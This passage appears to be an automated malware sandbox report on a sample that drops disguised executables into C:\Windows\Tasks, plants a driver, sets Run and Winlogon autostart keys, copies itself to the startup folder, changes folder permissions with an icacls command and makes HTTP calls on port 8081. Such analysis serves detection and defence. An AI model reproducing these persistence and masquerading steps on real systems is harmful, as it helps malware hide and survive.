                                  Source: C:\Windows\Bridgeprovider.exeCode function: 65_2_00007FFD9B6E7967 push ebx; retf 65_2_00007FFD9B6E796A
                                  Source: C:\Windows\Bridgeprovider.exeCode function: 65_2_00007FFD9B6E7C5F push eax; retf 65_2_00007FFD9B6E7C6D

                                  Persistence and Installation Behavior

                                  barindex
                                  Drops executables to the windows directory (C:\Windows) and starts them
                                  Source: C:\Windows\Tasks\IntelConfigService.exeExecutable created and started: C:\Windows\Tasks\Superfetch.exe
                                  Source: C:\Windows\Tasks\IntelConfigService.exeExecutable created and started: C:\Windows\Tasks\Wrap.exe
                                  Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows\Tasks\ApplicationsFrameHost.exe
                                  Source: C:\Windows\Tasks\MSTask.exeExecutable created and started: C:\Windows\Tasks\MSTask.exe
                                  Source: C:\Windows\SysWOW64\cmd.exeExecutable created and started: C:\Windows\Tasks\1.exe
                                  Source: C:\Windows\Tasks\Wmiic.exeExecutable created and started: C:\Windows\Tasks\IntelConfigService.exe
                                  Source: C:\Windows\SysWOW64\cmd.exeExecutable created and started: C:\Windows\Bridgeprovider.exe
                                  Source: C:\Windows\SysWOW64\cmd.exeExecutable created and started: C:\Windows\Tasks\Wmiic.exe
                                  Infects executable files (exe, dll, sys, html)
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exe
                                  Sample is not signed and drops a device driver
                                  Source: C:\ProgramData\migrate.exeFile created: C:\Windows\Tasks\WinRing0x64.sys
                                  Source: C:\ProgramData\migrate.exeFile created: C:\Windows\Tasks\MSTask.exeJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeFile created: C:\Windows\Temp\_MEI81722\_ctypes.pydJump to dropped file
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeFile created: C:\Windows\Temp\_MEI81722\_socket.pydJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\IZEltFrY.logJump to dropped file
                                  Source: C:\ProgramData\migrate.exeFile created: C:\Windows\Tasks\1.exeJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\brrRNKBn.logJump to dropped file
                                  Source: C:\ProgramData\migrate.exeFile created: C:\Windows\Tasks\Superfetch.exeJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\EjOumJqe.logJump to dropped file
                                  Source: C:\ProgramData\migrate.exeFile created: C:\Windows\Tasks\Wrap.exeJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\IIxTfkxV.logJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\sPPOvTaE.logJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeFile created: C:\Windows\Temp\_MEI81722\unicodedata.pydJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeFile created: C:\Windows\Temp\_MEI81722\VCRUNTIME140.dllJump to dropped file
                                  Source: C:\ProgramData\migrate.exeFile created: C:\Windows\Tasks\IntelConfigService.exeJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeFile created: C:\Windows\Temp\_MEI81722\libcrypto-1_1.dllJump to dropped file
                                  Source: C:\ProgramData\migrate.exeFile created: C:\Windows\Tasks\WinRing0x64.sysJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeFile created: C:\Windows\Temp\_MEI81722\python38.dllJump to dropped file
                                  Source: C:\Windows\Tasks\1.exeFile created: C:\Windows\Bridgeprovider.exeJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeFile created: C:\Windows\Temp\_MEI81722\python3.dllJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\UBnkPfhE.logJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Windows\INF\MicrosoftDefenger.exeJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\fZypqYbb.logJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeFile created: C:\Windows\Temp\_MEI81722\select.pydJump to dropped file
                                  Source: C:\ProgramData\migrate.exeFile created: C:\Windows\Tasks\Wmiic.exeJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\bjHzibbh.logJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeFile created: C:\Windows\Temp\_MEI81722\_cffi_backend.cp38-win_amd64.pydJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\OShKWlwM.logJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeFile created: C:\Windows\Temp\_MEI81722\libffi-7.dllJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\AtXEfMql.logJump to dropped file
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeFile created: C:\ProgramData\migrate.exeJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeFile created: C:\Windows\Temp\_MEI81722\_bz2.pydJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\QLwtIihK.logJump to dropped file
                                  Source: C:\ProgramData\migrate.exeFile created: C:\Windows\Tasks\MicrosoftPrt.exeJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\Aepdvrho.logJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\HcddYGcd.logJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\quigFLkP.logJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\syIwhxhC.logJump to dropped file
                                  Source: C:\ProgramData\migrate.exeFile created: C:\Windows\Tasks\ApplicationsFrameHost.exeJump to dropped file
                                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\MicrosoftPrt.exeJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeFile created: C:\Windows\Temp\_MEI81722\_queue.pydJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\hbkYLHfW.logJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeFile created: C:\Windows\Temp\_MEI81722\_hashlib.pydJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\UtDRkwHy.logJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeFile created: C:\Windows\Temp\_MEI81722\psutil\_psutil_windows.pydJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\KbrUPpvT.logJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\DmmmRJbk.logJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\OIKLmzcP.logJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeFile created: C:\Windows\Temp\_MEI81722\libssl-1_1.dllJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\tvjECxvw.logJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeFile created: C:\Windows\Temp\_MEI81722\_lzma.pydJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\vrXfSuSA.logJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeFile created: C:\Windows\Temp\_MEI81722\_ssl.pydJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeFile created: C:\Windows\Temp\_MEI81722\cryptography\hazmat\bindings\_rust.pydJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\mFfXERcN.logJump to dropped file
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeFile created: C:\ProgramData\migrate.exeJump to dropped file
                                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\MicrosoftPrt.exeJump to dropped file
                                  Source: C:\ProgramData\migrate.exeFile created: C:\Windows\Tasks\MSTask.exeJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeFile created: C:\Windows\Temp\_MEI81722\_ctypes.pydJump to dropped file
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeFile created: C:\Windows\Temp\_MEI81722\_socket.pydJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeFile created: C:\Windows\Temp\_MEI81722\_bz2.pydJump to dropped file
                                  Source: C:\ProgramData\migrate.exeFile created: C:\Windows\Tasks\MicrosoftPrt.exeJump to dropped file
                                  Source: C:\ProgramData\migrate.exeFile created: C:\Windows\Tasks\1.exeJump to dropped file
                                  Source: C:\ProgramData\migrate.exeFile created: C:\Windows\Tasks\Superfetch.exeJump to dropped file
                                  Source: C:\ProgramData\migrate.exeFile created: C:\Windows\Tasks\Wrap.exeJump to dropped file
                                  Source: C:\ProgramData\migrate.exeFile created: C:\Windows\Tasks\ApplicationsFrameHost.exeJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeFile created: C:\Windows\Temp\_MEI81722\_queue.pydJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeFile created: C:\Windows\Temp\_MEI81722\unicodedata.pydJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeFile created: C:\Windows\Temp\_MEI81722\VCRUNTIME140.dllJump to dropped file
                                  Source: C:\ProgramData\migrate.exeFile created: C:\Windows\Tasks\IntelConfigService.exeJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeFile created: C:\Windows\Temp\_MEI81722\_hashlib.pydJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeFile created: C:\Windows\Temp\_MEI81722\libcrypto-1_1.dllJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeFile created: C:\Windows\Temp\_MEI81722\psutil\_psutil_windows.pydJump to dropped file
                                  Source: C:\ProgramData\migrate.exeFile created: C:\Windows\Tasks\WinRing0x64.sysJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeFile created: C:\Windows\Temp\_MEI81722\python38.dllJump to dropped file
                                  Source: C:\Windows\Tasks\1.exeFile created: C:\Windows\Bridgeprovider.exeJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeFile created: C:\Windows\Temp\_MEI81722\libssl-1_1.dllJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeFile created: C:\Windows\Temp\_MEI81722\python3.dllJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeFile created: C:\Windows\Temp\_MEI81722\_lzma.pydJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Windows\INF\MicrosoftDefenger.exeJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeFile created: C:\Windows\Temp\_MEI81722\select.pydJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeFile created: C:\Windows\Temp\_MEI81722\_ssl.pydJump to dropped file
                                  Source: C:\ProgramData\migrate.exeFile created: C:\Windows\Tasks\Wmiic.exeJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeFile created: C:\Windows\Temp\_MEI81722\cryptography\hazmat\bindings\_rust.pydJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeFile created: C:\Windows\Temp\_MEI81722\_cffi_backend.cp38-win_amd64.pydJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeFile created: C:\Windows\Temp\_MEI81722\libffi-7.dllJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\mFfXERcN.logJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\UtDRkwHy.logJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\DmmmRJbk.logJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\syIwhxhC.logJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\brrRNKBn.logJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\IZEltFrY.logJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\fZypqYbb.logJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\OShKWlwM.logJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\EjOumJqe.logJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\tvjECxvw.logJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\bjHzibbh.logJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\KbrUPpvT.logJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\quigFLkP.logJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\OIKLmzcP.logJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\AtXEfMql.logJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\sPPOvTaE.logJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\hbkYLHfW.logJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\vrXfSuSA.logJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\UBnkPfhE.logJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\IIxTfkxV.logJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\Aepdvrho.logJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\QLwtIihK.logJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeFile created: C:\Users\user\Desktop\HcddYGcd.logJump to dropped file

                                  Boot Survival

                                  barindex
                                  Creates an autostart registry key pointing to binary in C:\Windows
                                  Source: C:\Windows\Bridgeprovider.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftDefenger
                                  Creates an undocumented autostart registry key
                                  Source: C:\Windows\Bridgeprovider.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                                  Drops PE files to the startup folder
                                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\MicrosoftPrt.exeJump to dropped file
                                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\MicrosoftPrt.exe
                                  Source: C:\ProgramData\migrate.exeFile created: C:\Windows\Tasks\__tmp_rar_sfx_access_check_4323765
                                  Source: C:\Windows\Tasks\Wmiic.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application\NSSM
                                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\MicrosoftPrt.exe
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 31_2_000000014000A2E0 _snwprintf_s,PathQuoteSpacesW,GetModuleFileNameW,GetModuleFileNameW,PathQuoteSpacesW,TlsAlloc,GetStdHandle,StartServiceCtrlDispatcherW,GetLastError,31_2_000000014000A2E0
                                  Source: C:\Windows\Bridgeprovider.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftDefenger
                                  Source: C:\Windows\Bridgeprovider.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftDefenger
                                  Source: C:\Windows\Bridgeprovider.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftDefenger
                                  Source: C:\Windows\Bridgeprovider.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftDefenger

                                  Hooking and other Techniques for Hiding and Protection

                                  barindex
                                  Loading BitLocker PowerShell Module
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Uses known network protocols on non-standard ports
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49739
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49740
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49742
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49744
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49752
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49773
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49795
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49820
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49842
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49863
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49888
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49909
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49930
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49951
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49972
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49999
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 50021
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 50028
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 50030
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 50033
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 50035
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 50038
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 50040
                                  Source: C:\Windows\Tasks\Wrap.exeCode function: 42_2_00007FF726CF61D4 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,42_2_00007FF726CF61D4
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
